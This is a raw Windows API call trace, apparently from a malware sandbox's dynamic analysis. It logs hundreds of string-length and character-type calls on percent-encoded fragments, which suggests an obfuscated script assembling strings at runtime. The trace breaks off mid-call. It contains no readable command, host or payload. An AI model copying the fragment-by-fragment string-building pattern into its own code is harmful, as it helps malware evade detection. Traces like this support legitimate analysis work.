[0102.189] SysStringLen (param_1="%c3%9e%74%c2%92%2b") returned 0x12 [0102.189] SysStringLen (param_1="%21%c2%9a%5d%47") returned 0xf [0102.190] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.191] MulDiv (nNumber=1009, nNumerator=100, nDenominator=2214) returned 46 [0102.191] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.191] GetTickCount () returned 0x210d885 [0102.191] SysStringLen (param_1="%72%69%65%6e") returned 0xc [0102.192] SysStringLen (param_1="%41%59%47%41") returned 0xc [0102.192] SysStringLen (param_1="%30%7c%32") returned 0x9 [0102.192] SysStringLen (param_1="%41%45%44%41") returned 0xc [0102.192] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.192] SysStringLen (param_1="%41%51%44%41") returned 0xc [0102.192] SysStringLen (param_1="%62%61%74%44") returned 0xc [0102.192] SysStringLen (param_1="%41%63%44%41") returned 0xc [0102.193] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.193] SysStringLen (param_1="%41%73%48%41") returned 0xc [0102.193] SysStringLen (param_1="%72%74%69%6c") returned 0xc [0102.193] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Í", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.194] SysStringLen (param_1="%74%42%67%4c") returned 0xc [0102.194] SysStringLen (param_1="%c3%b2%c2%9d%c3%b9%c2%9c") returned 0x18 [0102.194] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ò", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.194] SysStringLen (param_1="%3b%c2%bf%c3%a9%40") returned 0x12 [0102.194] SysStringLen (param_1="%c3%ba%0c%c3%89%2f") returned 0x12 [0102.194] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ú", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.195] SysStringLen (param_1="%61%0c%06%c2%9f") returned 0xf [0102.196] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.196] SysStringLen (param_1="%73%6c%61%6c") returned 0xc [0102.196] SysStringLen (param_1="%c3%ac%c3%aa%60%39") returned 0x12 [0102.196] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.197] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.197] MulDiv (nNumber=1003, nNumerator=100, nDenominator=2230) returned 45 [0102.197] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.197] GetTickCount () returned 0x210d885 [0102.197] GetTickCount () returned 0x210d885 [0102.197] SysStringLen (param_1="%2d%c2%be%18%c3%a8") returned 0x12 [0102.198] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ú", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.198] SysStringLen (param_1="%6c%76%6c%6a") returned 0xc [0102.198] SysStringLen (param_1="%43%50%65%72") returned 0xc [0102.198] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.198] SysStringLen (param_1="%43%52%65%73") returned 0xc [0102.199] SysStringLen (param_1="%c2%b0%75%c2%b7%3c") returned 0x12 [0102.199] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="°", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.199] SysStringLen (param_1="%77%38%2b%c2%ba") returned 0xf [0102.199] SysStringLen (param_1="%c3%87%3c%45%c2%89") returned 0x12 [0102.199] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ç", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.199] SysStringLen (param_1="%33%38%37%35%32%36%6c%53%42%48%53%6e") returned 0x24 [0102.199] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ê", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.200] SysStringLen (param_1="%c3%a8%c2%8c%c3%ae") returned 0x12 [0102.200] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="è", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.200] SysStringLen (param_1="%73%65%70%74") returned 0xc [0102.200] SysStringLen (param_1="%74%6c%79") returned 0x9 [0102.200] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x83", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.200] SysStringLen (param_1="%45%78%6f%63") returned 0xc [0102.200] SysStringLen (param_1="%3c%0b%36%1d") returned 0xc [0102.201] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x83", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.201] SysStringLen (param_1="%29%c2%b0%c2%aa%c3%9c") returned 0x15 [0102.201] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fbd00 | out: ppv=0xd6788fbd00*=0x24adf97e528) returned 0x0 [0102.203] MulDiv (nNumber=1023, nNumerator=100, nDenominator=2251) returned 45 [0102.203] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.203] GetTickCount () returned 0x210d885 [0102.203] SysStringLen (param_1="%41%51%43%41") returned 0xc [0102.203] SysStringLen (param_1="%54%72%6f%6c") returned 0xc [0102.203] SysStringLen (param_1="%c3%9d%c2%8a%c3%ae%c2%81") returned 0x18 [0102.203] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ý", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.203] SysStringLen (param_1="%2a%c2%8d%54") returned 0xc [0102.203] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.203] SysStringLen (param_1="%c3%af%34%c2%a0%c3%a9") returned 0x15 [0102.203] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.204] SysStringLen (param_1="%6c%65%64%53") returned 0xc [0102.204] SysStringLen (param_1="%c2%8b%40%c2%a3%1f") returned 0x12 [0102.204] SysStringLen (param_1="%c3%a0%c3%ad%60%3b") returned 0x12 [0102.204] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="à", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.204] SysStringLen (param_1="%c3%8d%53%00%5d") returned 0xf [0102.204] SysStringLen (param_1="%c3%81%7f%c2%91%c3%ac") returned 0x15 [0102.205] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="²", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.205] SysStringLen (param_1="%c2%90%4c%58%45") returned 0xf [0102.205] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x90", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.205] SysStringLen (param_1="%c3%9e%74%c2%92%2b") returned 0x12 [0102.205] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.205] SysStringLen (param_1="%04%c3%b2%35%c3%8c") returned 0x12 [0102.205] SysStringLen (param_1="%6f%41%48%4f") returned 0xc [0102.209] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.209] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.209] MulDiv (nNumber=1007, nNumerator=100, nDenominator=2252) returned 45 [0102.209] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.209] GetTickCount () returned 0x210d895 [0102.209] SysStringLen (param_1="%64%65%70%72") returned 0xc [0102.209] SysStringLen (param_1="%c3%85%0f%c2%89%c3%a6") returned 0x15 [0102.209] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Å", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.210] SysStringLen (param_1="%c2%a7%7f%57%2f") returned 0xf [0102.210] SysStringLen (param_1="%79%73%51%55") returned 0xc [0102.210] SysStringLen (param_1="%6e%6f%69%74") returned 0xc [0102.210] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ñ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.210] SysStringLen (param_1="%37%41%51%5a") returned 0xc [0102.211] SysStringLen (param_1="%74%61%74%69") returned 0xc [0102.211] SysStringLen (param_1="%72%74%69%6c") returned 0xc [0102.211] SysStringLen (param_1="%c3%9c%c2%8d%18%c2%a7") returned 0x15 [0102.211] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.211] SysStringLen (param_1="%52%26%2e") returned 0x9 [0102.212] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8b", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.212] SysStringLen (param_1="%c2%a1%71%5b%22") returned 0xf [0102.212] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¡", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.212] SysStringLen (param_1="%6c%65%48%61") returned 0xc [0102.212] SysStringLen (param_1="%c2%83%42%52%c2%80") returned 0x12 [0102.212] SysStringLen (param_1="%c2%99%59%c3%b0%62") returned 0x12 [0102.212] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x99", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.212] SysStringLen (param_1="%c2%bd%55%77%2a") returned 0xf [0102.213] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.214] MulDiv (nNumber=1004, nNumerator=100, nDenominator=2272) returned 44 [0102.214] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.214] GetTickCount () returned 0x210d895 [0102.214] SysStringLen (param_1="%53%75%70%65") returned 0xc [0102.215] SysStringLen (param_1="%09%c2%93%c2%8c%c3%b1") returned 0x15 [0102.215] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x93", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.215] SysStringLen (param_1="%43%50%65%72") returned 0xc [0102.215] SysStringLen (param_1="%43%72%65%61") returned 0xc [0102.215] SysStringLen (param_1="%74%65%64%53") returned 0xc [0102.216] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="­", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.216] SysStringLen (param_1="%c2%b8%44%75%60") returned 0xf [0102.216] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.216] SysStringLen (param_1="%41%6c%74%61") returned 0xc [0102.216] SysStringLen (param_1="%36%31%36%35%78%68%56%71%51%53") returned 0x1e [0102.217] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Á", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.217] SysStringLen (param_1="%c3%b6%c2%bf%38%c3%ac") returned 0x15 [0102.217] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ö", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.217] SysStringLen (param_1="%39%c2%94%c2%84%c3%b8") returned 0x15 [0102.217] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x86", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.218] SysStringLen (param_1="%33%56%73%75%56%4c%62") returned 0x15 [0102.219] SysStringLen (param_1="%6e%69%68%69") returned 0xc [0102.219] SysStringLen (param_1="%3c%0b%36%1d") returned 0xc [0102.219] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.221] MulDiv (nNumber=1005, nNumerator=100, nDenominator=2295) returned 44 [0102.221] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.221] GetTickCount () returned 0x210d895 [0102.221] SysStringLen (param_1="%37%32%35%37%39%35%54%78%53%56%6f%66") returned 0x24 [0102.221] SysStringLen (param_1="%c2%80%51%c3%a7%49") returned 0x12 [0102.222] SysStringLen (param_1="%75%42%51%5a") returned 0xc [0102.222] SysStringLen (param_1="%16%c2%b7%57%c2%bd") returned 0x12 [0102.222] SysStringLen (param_1="%75%41%41%53") returned 0xc [0102.223] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x82", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.223] SysStringLen (param_1="%67%62%46%4c") returned 0xc [0102.223] SysStringLen (param_1="%c3%aa%69%5f%6b") returned 0xf [0102.224] SysStringLen (param_1="%05%4c%21%27") returned 0xc [0102.224] SysStringLen (param_1="%62%61%74%44") returned 0xc [0102.224] SysStringLen (param_1="%c3%8d%53%00%5d") returned 0xf [0102.224] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Í", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.224] SysStringLen (param_1="%c3%a4%c2%ae%2d%c2%86") returned 0x15 [0102.225] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ä", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.225] SysStringLen (param_1="%c3%87%c2%9a%1e%c2%83") returned 0x15 [0102.226] SysStringLen (param_1="%c3%b3%6d%c2%96%c3%a6") returned 0x15 [0102.226] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.227] SysStringLen (param_1="%c3%99%20%c3%b8%2a") returned 0x12 [0102.227] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ù", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.227] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.227] MulDiv (nNumber=1028, nNumerator=100, nDenominator=2320) returned 44 [0102.227] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.227] GetTickCount () returned 0x210d8a4 [0102.227] SysStringLen (param_1="%6a%c3%a8%c3%9e%4d") returned 0x12 [0102.228] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9d", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.228] SysStringLen (param_1="%c2%b5%50%4e%02") returned 0xf [0102.228] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="µ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.228] SysStringLen (param_1="%c2%8f%00%c3%bb%3f") returned 0x12 [0102.229] SysStringLen (param_1="%c2%a0%49%49%24") returned 0xf [0102.229] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.229] SysStringLen (param_1="%c3%ac%c3%aa%60%39") returned 0x12 [0102.229] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.229] SysStringLen (param_1="%6e%6f%69%74") returned 0xc [0102.229] SysStringLen (param_1="%1c%25%18%24") returned 0xc [0102.229] SysStringLen (param_1="%c2%98%c3%b6%06%2f") returned 0x12 [0102.230] SysStringLen (param_1="%41%67%43%41") returned 0xc [0102.230] SysStringLen (param_1="%4b%67%72%43") returned 0xc [0102.230] SysStringLen (param_1="%73%51%43%72") returned 0xc [0102.230] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.230] SysStringLen (param_1="%c3%a9%7d%c2%8a%c2%bf") returned 0x15 [0102.231] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.231] SysStringLen (param_1="%61%6c%75%73") returned 0xc [0102.231] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.231] SysStringLen (param_1="%6f%69%65%73") returned 0xc [0102.232] SysStringLen (param_1="%73%65%70%74") returned 0xc [0102.232] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.233] free (_Block=0x24ae139bdb0) [0102.234] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2323) returned 44 [0102.234] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.234] GetTickCount () returned 0x210d8a4 [0102.234] SysStringLen (param_1="%c2%bd%55%77%2a") returned 0xf [0102.234] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="½", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.235] SysStringLen (param_1="%c3%ab%c2%8c%c3%b8") returned 0x12 [0102.235] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.235] SysStringLen (param_1="%c2%be%6a%c2%b9%c2%b3") returned 0x15 [0102.235] SysStringLen (param_1="%c3%b0%5d%c2%84%c3%a0") returned 0x15 [0102.235] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ð", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.236] SysStringLen (param_1="%c2%b6%5a%c3%a5%6c") returned 0x12 [0102.236] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.236] SysStringLen (param_1="%c2%a8%c2%96%02%51") returned 0x12 [0102.236] SysStringLen (param_1="%c3%97%03%c3%bb%0c") returned 0x12 [0102.236] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="×", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.237] SysStringLen (param_1="%29%c2%82%c2%9f%c3%b2") returned 0x15 [0102.237] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x96", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.238] SysStringLen (param_1="%61%1c%05%c2%9f") returned 0xf [0102.239] SysStringLen (param_1="%6c%65%64%53") returned 0xc [0102.239] SysStringLen (param_1="%39%c2%94%c2%84%c3%b8") returned 0x15 [0102.239] SysStringLen (param_1="%c2%89%6d%70%43") returned 0xf [0102.239] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x89", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.239] SysStringLen (param_1="%72%73%65") returned 0x9 [0102.241] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="«", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.241] SysStringLen (param_1="%15%c2%9d%30%18") returned 0xf [0102.241] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.242] MulDiv (nNumber=1018, nNumerator=100, nDenominator=2337) returned 44 [0102.242] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.243] GetTickCount () returned 0x210d8b4 [0102.243] SysStringLen (param_1="%37%41%51%4e") returned 0xc [0102.243] SysStringLen (param_1="%78%41%77%4c") returned 0xc [0102.243] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8f", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.243] SysStringLen (param_1="%c3%af%33%c3%ad%00") returned 0x12 [0102.243] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.244] SysStringLen (param_1="%15%13%c3%81%42") returned 0xf [0102.244] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ª", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.244] SysStringLen (param_1="%5c%c3%9e%1a%c3%a0") returned 0x12 [0102.245] SysStringLen (param_1="%c3%85%0f%c2%89%c3%a6") returned 0x15 [0102.245] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Å", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.245] SysStringLen (param_1="%c3%aa%69%5f%6b") returned 0xf [0102.245] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ê", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.245] SysStringLen (param_1="%74%69%6f%6e") returned 0xc [0102.245] SysStringLen (param_1="%4f%50%46%61") returned 0xc [0102.246] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x96", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.246] SysStringLen (param_1="%2d%c2%84%c3%b7%1e") returned 0x12 [0102.246] SysStringLen (param_1="%43%6f%6e%64") returned 0xc [0102.246] SysStringLen (param_1="%76%69%50%55") returned 0xc [0102.248] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x81", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.248] SysStringLen (param_1="%79%7a%65%72") returned 0xc [0102.248] SysStringLen (param_1="%c2%8f%52%c3%81%61") returned 0x12 [0102.248] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.249] MulDiv (nNumber=994, nNumerator=100, nDenominator=2348) returned 42 [0102.249] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.249] GetTickCount () returned 0x210d8b4 [0102.249] SysStringLen (param_1="%38%36%36%38%34%74%7a%6b%55%6d%63") returned 0x21 [0102.249] SysStringLen (param_1="%6c%65%48%61") returned 0xc [0102.249] SysStringLen (param_1="%c2%8f%00%c3%bb%3f") returned 0x12 [0102.249] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8f", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.249] SysStringLen (param_1="%c2%8a%00%c3%8d%21") returned 0x12 [0102.249] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.249] SysStringLen (param_1="%69%65%73%53") returned 0xc [0102.250] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="°", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.250] SysStringLen (param_1="%69%72%69%73") returned 0xc [0102.250] SysStringLen (param_1="%c2%ac%45%45%27") returned 0xf [0102.250] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¬", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.250] SysStringLen (param_1="%43%48%65%70") returned 0xc [0102.250] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="´", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.250] SysStringLen (param_1="%79%42%77%62") returned 0xc [0102.251] SysStringLen (param_1="%c2%9e%5b%c2%a5%1f") returned 0x12 [0102.251] SysStringLen (param_1="%c2%9a%c2%b5%3d%5e") returned 0x12 [0102.251] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.251] SysStringLen (param_1="%41%6c%74%61") returned 0xc [0102.251] SysStringLen (param_1="%61%6c%75%73") returned 0xc [0102.252] SysStringLen (param_1="%c3%b2%73%c2%93%c3%b3") returned 0x15 [0102.252] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ò", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.252] SysStringLen (param_1="%41%63%47%41") returned 0xc [0102.252] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.253] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.254] MulDiv (nNumber=1023, nNumerator=100, nDenominator=2378) returned 43 [0102.254] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.254] GetTickCount () returned 0x210d8c4 [0102.254] SysStringLen (param_1="%c2%a6%74%c3%8b%c2%a0") returned 0x15 [0102.254] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¦", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.254] SysStringLen (param_1="%c3%8c%35%c2%ae%c3%aa") returned 0x15 [0102.254] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.254] SysStringLen (param_1="%53%c2%b7%61%c2%85") returned 0x12 [0102.255] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¤", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.255] SysStringLen (param_1="%5c%c2%87%c3%84%3a") returned 0x12 [0102.255] SysStringLen (param_1="%53%42%67%51") returned 0xc [0102.255] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ì", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.255] SysStringLen 